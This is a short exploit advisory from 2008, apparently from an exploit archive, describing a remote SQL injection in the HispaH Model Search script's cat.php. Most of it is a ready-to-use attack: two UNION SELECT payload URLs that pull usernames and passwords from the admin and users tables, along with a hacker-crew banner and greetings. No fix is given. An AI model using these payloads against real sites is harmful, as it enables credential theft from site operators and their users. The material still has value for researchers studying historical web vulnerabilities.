HispaH Model Search (cat.php cat) Remote SQL Injection Vulnerability

2008-05-09 00:00:00

############### >>> Remote SQL Injection <<< ###############
## Cyb3r-1st Cyb3r-1st ##
################## >>> InjEctOr5 TeaM <<< ################

## author : cyb3r-1st
## contact : t3tto0 [at] yahoo.com
cyb3r-1st [at] hotmail.com

## script : model-search
## download : www.hispah.com/demos/models1rock ::> demo

## dork : find it
## exploit : http://www.site.me/cat.php?cat=[sql injection]

## example:here u can found an sql exploit :::
## for admin inf0 :::
www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+admin/*
## for users inf0 :::
www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+users/*


########### Greetz #############

>>> InjEctOr5 TeaM
>>>my best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy -x and all freinds
>>> all muslims

#

Fixes

No fixes

In order to submit a new fix you need to be registered.